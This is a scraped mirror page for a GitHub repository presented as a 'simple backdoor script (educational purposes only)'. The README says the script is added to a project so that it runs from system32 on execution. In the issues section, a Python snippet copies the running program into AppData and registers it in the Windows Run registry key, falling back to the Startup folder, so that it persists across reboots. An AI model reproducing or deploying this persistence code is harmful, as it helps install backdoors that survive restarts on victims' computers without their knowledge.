Giter Site home page Giter Site logo

backdoor's Introduction

Welcome to Cookies Simple Backdoor Script ๐Ÿ‘‹

Simple backdoor script (educational purposes only)

Add this to your project to make it run in system32 folder on execution!

๐Ÿ‘ค ใ€ข Author

๐Ÿ‘ค CookiesKush420

๐Ÿค ใ€ข Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.

๐ŸŒŸ ใ€ข Show your support

Give a โญ๏ธ if this project helped you!

backdoor's People

Contributors

cookieskush avatar

Stargazers

kxser avatar

Watchers

 avatar

backdoor's Issues

u can also try that

       try:
            print("adding program to run")
            key1 = winreg.HKEY_CURRENT_USER
            key_value1 ="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
            open_ = winreg.CreateKeyEx(key1,key_value1,0,winreg.KEY_WRITE)
            winreg.SetValueEx(open_,"type_here_something",0,winreg.REG_SZ, shutil.copy(sys.argv[0], os.getenv("appdata")+os.sep+os.path.basename(sys.argv[0])))
            open_.Close()
            print("Successfully added it to `run` startup")
        except PermissionError:
            try:
                shutil.copy(sys.argv[0], os.getenv("appdata")+"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+os.path.basename(sys.argv[0]))
                print("Permission was denied, added it to `startup folder` instead")
            except:
                pass

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.